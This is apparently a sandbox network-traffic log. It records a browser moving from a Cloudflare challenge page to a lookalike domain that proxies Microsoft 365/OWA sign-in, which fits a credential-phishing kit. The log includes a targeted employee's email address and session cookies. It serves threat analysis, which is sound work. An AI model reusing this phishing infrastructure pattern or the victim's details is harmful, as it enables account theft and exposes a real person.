Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://venicuttnortheastusa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=89753409dd24c413 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: venicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://venicuttnortheastusa.com/?lbkwmykb=446d7ae8e2b0026c09e952c1046f26eb20f17c5c86fdb89bf6a6962aa75a09f904517ec41333b61ba7f0802aa8928dcdb1650ecd8ee69f3c108083478cb5684c&qrc=lawrence.france%40cabinetworksgroup.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1948751740:1718982784:WDeBEXsU0BuhHpcRHj_Qz0Y1LR73mHniYIkcolTqRHE/89753409dd24c413/1eefe65da7da1cb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/89753409dd24c413/1718985542215/NHJ4YjgTp1IBEyq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/89753409dd24c413/1718985542216/9dfeb1619e2d4256adeded2d3a314ce177c6630fc10756bc799dd97c0ee0fe89/kMSECQtSKPC8EFA HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/89753409dd24c413/1718985542215/NHJ4YjgTp1IBEyq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1948751740:1718982784:WDeBEXsU0BuhHpcRHj_Qz0Y1LR73mHniYIkcolTqRHE/89753409dd24c413/1eefe65da7da1cb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1948751740:1718982784:WDeBEXsU0BuhHpcRHj_Qz0Y1LR73mHniYIkcolTqRHE/89753409dd24c413/1eefe65da7da1cb HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3dlYm5uaWN1dHRub3J0aGVhc3R1c2EuY29tLyIsImRvbWFpbiI6IndlYm5uaWN1dHRub3J0aGVhc3R1c2EuY29tIiwia2V5IjoiTm1YcDJ4Tm9uY3JBIiwicXJjIjoibGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbSIsImlhdCI6MTcxODk4NTU3NywiZXhwIjoxNzE4OTg1Njk3fQ.HykXssHfF_M4UV6XA1brZjWnq3CfmkAs4Wo7LDtvRyM HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://venicuttnortheastusa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?qrc=lawrence.france%40cabinetworksgroup.com HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://venicuttnortheastusa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8
Source: global traffic	HTTP traffic detected: GET /owa/?login_hint=lawrence.france%40cabinetworksgroup.com HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://venicuttnortheastusa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8
Source: global traffic	HTTP traffic detected: GET /?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg= HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://venicuttnortheastusa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_sw-M8KkV3_nBot-G1ImRcw2.js HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; fpc=Ahr3BJFnNFVEniLAsb5y5xM; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYIig8xnszn6jmmWn4La-r11-kTJ9w8wao0NlfrB-saX422YvC0f5C00BDqgFTmTuinzY2zwsly9b975IuaKlo1F1voYJSFm4b2UelwkAB7ZKJuUCT-GxigDiuqbVpgOBPyrxgTmChDLPtm5Goeq-gSSoZwFH5HckoYOkj4sV6HkIgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
Source: global traffic	HTTP traffic detected: GET /?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=&sso_reload=true HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmz
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://webnnicuttnortheastusa.com/?i205f05ud=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1sYXdyZW5jZS5mcmFuY2UlNDBjYWJpbmV0d29ya3Nncm91cC5jb20mY2xpZW50LXJlcXVlc3QtaWQ9ZDlhM2YyZTMtMjE2NC1kODVkLTNiMmUtMjg3ZGMzNDM1OWVlJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU0NTgyMzcwNDA1OTA0MS5jODc0MzE2ZS0zMTJlLTQ1MWYtODQ4Ny1hNGYwZDFmNmIyMjMmc3RhdGU9RFl0QkRzSWdFQUJCMy1LUmRvRUYxb1B4S1lZaVZHSUxCbXY0dmh4bTVqU2NNWFllbkFZY2hwaXptZ3dhVXRvQmdya0N5aW1RUXkxdEZGcXFLTkRJSkFqSkNZOEpuakxaUlNuTngwdHo3WDYtYjNYTjVmSEs1Ymh0dnJkWVFweFM4eU1YaE9DWFhPTFJhM3RfMTFaX255blVfUTg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; ClientId=DC6EE31578E74AAEA2886B6234ACAA88; OIDC=1; OpenIdConnect.nonce.v3.f5DiCeMUtBQ2uL8n9vjBqgjOau5wx5op5bEdqzXqekA=638545823704059041.c874316e-312e-451f-8487-a4f0d1f6b223; X-OWA-RedirectHistory=ArLym14BoYywIguS3Ag; esctx-Ghbu3M8NGZw=AQABCQEAAAApTwJmzXqdR4BN2miheQMYGF6vujKXDYHK1lda4NaoP7399KrTzgz6gd8AWbma8TJtEi2nN6G7u-UHxyrlOK_xc1us_1Ii1677t_7CXaJev_q9Y10ngeMo-SZIqrMpf5pPlOKVgV2wj0x2z7n3nIuQ2jf8bcStGO3kAEvmYxKV4iAA; fpc=Ahr3BJFnNFVEniLAsb5y5xM; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYIig8xnszn6jmmWn4La-r11-kTJ9w8wao0NlfrB-saX422YvC0f5C00BDqgFTmTuinzY2zwsly9b975IuaKlo1F1voYJSFm4b2UelwkAB7ZKJuUCT-GxigDiuqbVpgOBPyrxgTmChDLPtm5Goeq-gSSoZwFH5HckoYOkj4sV6HkIgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_mc5ac6ol0l4d2iaqspstyg2.css HTTP/1.1Host: webnnicuttnortheastusa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: 